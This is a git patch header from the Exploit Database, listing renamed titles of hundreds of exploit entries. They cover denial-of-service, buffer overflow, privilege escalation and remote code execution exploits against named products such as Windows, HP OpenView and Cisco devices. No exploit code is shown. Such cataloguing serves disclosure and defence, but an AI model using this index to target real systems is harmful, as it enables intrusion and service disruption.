From 86f822c557eb439f0d12456446cc8723c32a97d0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 23 Jun 2017 05:01:28 +0000 Subject: [PATCH] DB: 2017-06-23 11 new exploits Microsoft Windows - ASN.1 LSASS.exe Remote Exploit (MS04-007) Microsoft Windows - ASN.1 'LSASS.exe' Remote Exploit (MS04-007) Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit Slackware Linux - '/usr/bin/ppp-off' Insecure /tmp Call Exploit Microsoft Windows XP/2000 - TCP Connection Reset Remote Attack Tool Microsoft Windows XP/2000 - TCP Connection Reset Remote Exploit PostgreSQL 8.01 - Remote Reboot Denial of Service PostgreSQL 8.01 - Remote Reboot (Denial of Service) Cisco IP Phone 7940 - (Reboot) Denial of Service Cisco IP Phone 7940 - Reboot (Denial of Service) Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Attack Denial of Service Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service) Dropbear / OpenSSH Server - (MAX_UNAUTH_CLIENTS) Denial of Service Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service 2WIRE Modems/Routers - CRLF Denial of Service 2WIRE Modems/Routers - 'CRLF' Denial of Service FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service) Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Cisco Phone 7940/7960 - 'SIP INVITE' Remote Denial of Service Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Hang / Crash (Denial of Service) Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 - Hang / Crash (Denial of Service) Linksys SPA941 - (remote reboot) Remote Denial of Service Linksys SPA941 - Remote Reboot (Denial of Service) CA BrightStor Backup 11.5.2.0 - caloggderd.exe Denial of Service CA BrightStor Backup 11.5.2.0 - Mediasvr.exe Denial of Service CA BrightStor Backup 11.5.2.0 - 'caloggderd.exe' Denial of Service CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Denial of Service Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) - Denial of Service Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service Xerox Phaser 8400 - (reboot) Remote Denial of Service Xerox Phaser 8400 - Remote Reboot (Denial of Service) Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot (Denial of Service) Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service Linksys WAG54G v2 Wireless ADSL Router - httpd Denial of Service Netgear SSL312 Router - Denial of Service NETGEAR SSL312 Router - Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service NETGEAR WGR614v9 Wireless Router - Denial of Service Gigaset SE461 WiMAX router - Remote Denial of Service Gigaset SE461 WiMAX Router - Remote Denial of Service Netgear DG632 Router - Remote Denial of Service NETGEAR DG632 Router - Remote Denial of Service Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC) Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC) Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot (Denial of Service) Siemens Gigaset SE361 WLAN - Remote Reboot Exploit Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service) Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service) Apple Mac OSX 10.6 - HFS FileSystem Exploit (Denial of Service) HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC) Cyclope Internet Filtering Proxy 4.0 - 'CEPMServer.exe' Denial of Service (PoC) AirTies-4450 - Unauthorized Remote Reboot AirTies-4450 - Unauthorized Remote Reboot (Denial of Service) Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit SunOS 4.1.1 - /usr/release/bin/makeinstall Exploit SunOS 4.1.1 - /usr/release/bin/winstall Exploit Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Exploit SunOS 4.1.1 - '/usr/release/bin/makeinstall' Exploit SunOS 4.1.1 - '/usr/release/bin/winstall' Exploit Linux Kernel 2.2 - 'ldd core' Force Reboot Linux Kernel 2.2 - 'ldd core' Force Reboot (Denial of Service) Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow OReilly WebSite 1.x/2.0 - 'win-c-sample.exe' Buffer Overflow Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption (Denial of Service) ID Software Quake 3 - 'smurf attack' Denial of Service ID Software Quake 3 - 'SMURF' Denial of Service Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow Melange Chat System 2.0.2 Beta 2 - '/yell' Remote Buffer Overflow Microsoft Windows NT/2000 - cmd.exe CD Buffer Overflow Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow Gordano Messaging Suite 9.0 - WWW.exe Denial of Service Gordano Messaging Suite 9.0 - 'WWW.exe' Denial of Service TYPSoft FTP Server 1.1 - Remote CPU Consumption Denial of Service TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service) Microsoft Windows XP - explorer.exe Remote Denial of Service Microsoft Windows XP - 'explorer.exe' Remote Denial of Service VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions VMware Workstation - 'vprintproxy.exe' JPEG2000 Images Multiple Memory Corruptions Gattaca Server 2003 - web.tmpl Language Variable CPU Consumption Denial of Service Gattaca Server 2003 - 'web.tmpl' 'Language' Parameter CPU Consumption (Denial of Service) VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow Microsoft Windows XP - explorer.exe .tiff Image Denial of Service Microsoft Windows XP - 'explorer.exe' '.tiff' Image Denial of Service Microsoft Windows XP - TSShutdn.exe Remote Denial of Service Microsoft Windows XP - 'TSShutdn.exe' Remote Denial of Service Orenosv HTTP/FTP Server 0.8.1 - CGISSI.exe Remote Buffer Overflow Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow PHPMailer 1.7 - Data() Function Remote Denial of Service PHPMailer 1.7 - 'Data()' Function Remote Denial of Service Sights 'N Sounds Streaming Media Server 2.0.3 - SWS.exe Buffer Overflow Sights 'N Sounds Streaming Media Server 2.0.3 - 'SWS.exe' Buffer Overflow DSocks 1.3 - Name Variable Buffer Overflow DSocks 1.3 - 'Name' Parameter Buffer Overflow Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow Android Zygote - Socket and Fork bomb Attack Android Zygote - Socket and Fork Bomb (Denial of Service) Nvidia NView 3.5 - Keystone.exe Local Denial of Service Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service Ipswitch WS_FTP 2007 Professional - WSFTPURL.exe Local Memory Corruption Ipswitch WS_FTP 2007 Professional - 'WSFTPURL.exe' Local Memory Corruption Larson Network Print Server 9.4.2 build 105 - (LstNPS) NPSpcSVR.exe License Command Remote Overflow Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow Linksys WRH54G 1.1.3 - (Wireless-G Router) Malformed HTTP Request Denial of Service Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote Denial of Service Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service Adobe Flash - Setting Variable Use-After-Free Adobe Flash - 'Setting' Variable Use-After-Free Git 1.9.5 - ssh-agent.exe Buffer Overflow Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow Adobe Flash TextField Variable - Use-After Free Adobe Flash TextField.Variable Setter - Use-After-Free Adobe Flash - 'TextField' Variable Use-After Free Adobe Flash - TextField.Variable Setter Use-After-Free Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/reboot.cgi Unauthenticated Remote Reboot Denial of Service Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service) Microsoft WinDbg - logviewer.exe Crash (PoC) Microsoft WinDbg - 'logviewer.exe' Crash (PoC) Microsoft Windows - 'win32k!NtGdiExtGetObjectW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetOutlineTextMetricsInternalW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetTextMetricsW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetRealizationInfo' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!ClientPrinterThunk' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (BasicLimitInformation_ ExtendedLimitInformation)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationProcess (ProcessVmCounters)' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiMakeFontDir' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure UUCP Exploit - File Creation/Overwriting (symlinks) Exploit UUCP Exploit - File Creation/Overwriting (Symlinks) Exploit HP-UX 11.0 - /bin/cu Privilege Escalation HP-UX 11.0 - '/bin/cu' Privilege Escalation Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Solaris 2.6 / 2.7 - '/usr/bin/write' Local Overflow IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - /usr/lib/print/netprint Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Exploit Tru64 UNIX 4.0g - /usr/bin/at Privilege Escalation Slackware 7.1 - /usr/bin/mail Local Exploit Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation Slackware 7.1 - '/usr/bin/mail' Local Exploit Solaris 2.4 - /bin/fdformat Local Buffer Overflows Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities AIX 4.2 - /usr/dt/bin/dtterm Local Buffer Overflow AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow SGI IRIX - /bin/login Local Buffer Overflow IRIX 5.3 - /usr/sbin/iwsh Buffer Overflow Privilege Escalation SGI IRIX - '/bin/login Local' Buffer Overflow IRIX 5.3 - '/usr/sbin/iwsh' Buffer Overflow Privilege Escalation Apple Mac OSX 10.3.7 - mRouter Privilege Escalation Apple Mac OSX 10.3.7 - 'mRouter' Privilege Escalation Sudo 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Privilege Escalation Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit HP-UX 11i - (LIBC TZ enviroment Variable) Privilege Escalation HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation Adobe Photoshop CS2 - / CS3 Unspecified '.bmp' File Buffer Overflow Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow Debian - (symlink attack in login) Arbitrary File Ownership (PoC) Debian - (Symlink In Login) Arbitrary File Ownership (PoC) Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack xscreensaver 5.01 - Arbitrary File Disclosure Symlink Exploit PHP 5.2.12/5.3.1 - symlink() open_basedir Bypass PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH) HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH) Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL Microsoft Windows 7 - 'wab32res.dll' 'wab.exe' DLL Hijacking Oracle 10/11g - exp.exe Parameter file Local Buffer Overflow (PoC) Oracle 10/11g - 'exp.exe' 'file' Parameter Local Buffer Overflow (PoC) ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT symlink ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT Symlink Exploit Hancom Office 2007 - Reboot.ini Clear-Text Passwords Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords G. Wilford man 2.3.10 - Symlink G. Wilford man 2.3.10 - Symlink Exploit X11R6 3.3.3 - Symlink X11R6 3.3.3 - Symlink Exploit SGI IRIX 6.2 - /usr/lib/netaddpr Exploit SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit SCO Open Server 5.0.5 - 'userOsa' symlink SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Spoolss.exe DLL Insertion Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Spoolss.exe' DLL Insertion FreeBSD 3.3 gdc - Symlink FreeBSD 3.3 gdc - Symlink Exploit SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink Exploit FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - /proc File Sytem FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - '/proc' FileSystem Exploit Debian 2.1 - apcd Symlink Debian 2.1 - apcd Symlink Exploit SCO Unixware 7.1/7.1.1 - ARCserver /tmp symlink SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit Sun Workshop 5.0 - Licensing Manager Symlink Sun Workshop 5.0 - Licensing Manager Symlink Exploit Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink Exploit OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink Exploit KDE 1.1 - /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow KDE 1.1/1.1.1/1.1.2/1.2 - kdesud DISPLAY Environment Variable Overflow HP-UX 10.20/11.0 man - /tmp Symlink Exploit HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit HP-UX 10.20/11.0 crontab - /tmp File HP-UX 10.20/11.0 - crontab '/tmp' File Exploit Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation Solaris 10 Patch 137097-01 - Symlink Privilege Escalation Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Tower Toppler 0.99.1 - 'Display' Parameter Local Buffer Overflow Microsoft Windows Server 2000 - RegEdit.exe Registry Key Value Buffer Overflow Microsoft Windows Server 2000 - 'RegEdit.exe' Registry Key Value Buffer Overflow RedHat 9.0 / Slackware 8.1 - /bin/mail Carbon Copy Field Buffer Overrun RedHat 9.0 / Slackware 8.1 - '/bin/mail' Carbon Copy Field Buffer Overrun Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Linux Kernel 2.2.x / 2.4.x - '/proc' Filesystem Potential Information Disclosure Microsoft Windows XP/2000 - RunDLL32.exe Buffer Overflow Microsoft Windows XP/2000 - 'RunDLL32.exe' Buffer Overflow Tower Toppler 0.96 - HOME Environment Variable Local Buffer Overflow Tower Toppler 0.96 - 'HOME Environment' Parameter Local Buffer Overflow Top 1.x/2.0 - Home Environment Variable Local Buffer Overflow Top 1.x/2.0 - 'Home Environment' Parameter Local Buffer Overflow XBlast 2.6.1 - HOME Environment Variable Buffer Overflow XBlast 2.6.1 - 'HOME Environment' Variable Buffer Overflow XPCD 2.0.8 - Home Environment Variable Local Buffer Overflow XPCD 2.0.8 - 'Home Environment' Variable Local Buffer Overflow XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun XSOK 1.0 2 - 'LANG Environment' Variable Local Buffer Overrun Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution ELinks Relative 0.10.6 / 011.1 - Path Arbitrary Code Execution Oracle - HtmlConverter.exe Buffer Overflow Oracle - 'HtmlConverter.exe' Buffer Overflow Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Exploit Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036) Microsoft Windows - DHCP Client Broadcast Exploit (MS06-036) Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - (FTP) Remote Exploit Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - 'FTP' Remote Exploit Oracle 9i / 10g - 'utl_file' File System Access Exploit Oracle 9i / 10g - 'utl_file' FileSystem Access Exploit HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'ovalarmsrv.exe' Remote Overflow Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb) Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB) Sagem F@ST (Routers) - (dhcp hostname attack) Cross-Site Request Forgery Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC) Microsoft Windows - SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068) Microsoft Windows - SmbRelay3 NTLM Replay Exploit (MS08-068) Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Attack Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Apple Safari 3.2.x - (XXE attack) Local File Theft Apple Safari 3.2.x - (XXE) Local File Theft Netgear DG632 Router - Authentication Bypass NETGEAR DG632 Router - Authentication Bypass BRS Webweaver 1.33 - /Scripts Access Restriction Bypass BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow Ada Image Server 0.6.7 - 'imgsrv.exe' Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovalarm.exe' CGI Unauthenticated Remote Buffer Overflow HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow Cisco ASA 8.x - VPN SSL Module Clientless URL-list control Bypass HP OpenView Network Node Manager (OV NNM) - OvWebHelp.exe CGI Topic Overflow HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid Hostname Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid ICount Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit minerCPP 0.4b - Remote Buffer Overflow / Format String Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1) HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (1) HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2) HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (2) Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit) Microsoft Internet Explorer - 'Winhlp32.exe' MsgBox Code Execution (MS10-023) (Metasploit) IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow (Metasploit) IBM Lotus Domino Sametime - 'STMux.exe' Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - 'OVAS.exe' Unauthenticated Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Snmp.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovalarm.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'OpenView5.exe' CGI Buffer Overflow (Metasploit) IBM TPM for OS Deployment 5.1.0.x - rembo.exe Buffer Overflow (Metasploit) IBM TPM for OS Deployment 5.1.0.x - 'rembo.exe' Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - EarthAgent.exe Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe execvp Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'OvJavaLocale' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'execvp' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit) HP OpenView Network Node Manager - snmpviewer.exe Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe' 'schdParams' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'ICount' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'main' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' Unrecognized Option Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'ovutil' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'Hostname' CGI Buffer Overflow (Metasploit) 7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit) 7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Stack Overflow (Metasploit) Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow (Metasploit) Citrix Provisioning Services 5.6 - 'streamprocess.exe' Buffer Overflow (Metasploit) FactoryLink - vrn.exe Opcode 9 Buffer Overflow (Metasploit) FactoryLink - 'vrn.exe' Opcode 9 Buffer Overflow (Metasploit) HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit) HP - 'OmniInet.exe' Opcode 27 Buffer Overflow (Metasploit) Symantec Backup Exec 12.5 - MiTM Attack Symantec Backup Exec 12.5 - Man In The Middle Exploit HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Cookie Handling Buffer Overflow (Metasploit) Sunway Force Control SCADA 6.1 SP3 - httpsrv.exe Exploit Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Exploit Procyon Core Server HMI 1.13 - Coreservice.exe Stack Buffer Overflow (Metasploit) Procyon Core Server HMI 1.13 - 'Coreservice.exe' Stack Buffer Overflow (Metasploit) HP Diagnostics Server - magentservice.exe Overflow (Metasploit) HP Diagnostics Server - 'magentservice.exe' Overflow (Metasploit) Sunway ForceControl - SNMP NetDBServer.exe Opcode 0x57 (Metasploit) Sunway ForceControl - SNMP 'NetDBServer.exe' Opcode 0x57 (Metasploit) Trend Micro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow (Metasploit) Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Stack Buffer Overflow (Metasploit) Antelope Software W4-Server 2.6 a/Win32 - Cgitest.exe Buffer Overflow Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Buffer Overflow Netscape Enterprise Server / Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities Netscape Enterprise Server / Novell Groupwise 5.2/5.5 - 'GWWEB.EXE' Multiple Vulnerabilities FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - htimage.exe File Existence Disclosure FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - 'htimage.exe' File Existence Disclosure NAI Net Tools PKI Server 1.0 - strong.exe Buffer Overflow NAI Net Tools PKI Server 1.0 - 'strong.exe' Buffer Overflow Mandrake 6.1/7.0/7.1 - /perl http Directory Disclosure Mandrake 6.1/7.0/7.1 - '/perl' HTTP Directory Disclosure Microsoft IIS 3.0 - newdsn.exe File Creation Microsoft IIS 3.0 - 'newdsn.exe' File Creation Greg Matthews - Classifieds.cgi 1.0 Hidden Variable Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - 'wguest.exe' Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - 'rguest.exe' Arbitrary File Access MetaProducts Offline Explorer 1.x - File System Disclosure MetaProducts Offline Explorer 1.x - FileSystem Disclosure Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Detection Evasion Webmin 1.580 - /file/show.cgi Remote Command Execution (Metasploit) Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow (Metasploit) HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow (Metasploit) HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit) HP Operations Agent - Opcode 'coda.exe' 0x34 Buffer Overflow (Metasploit) Netgear 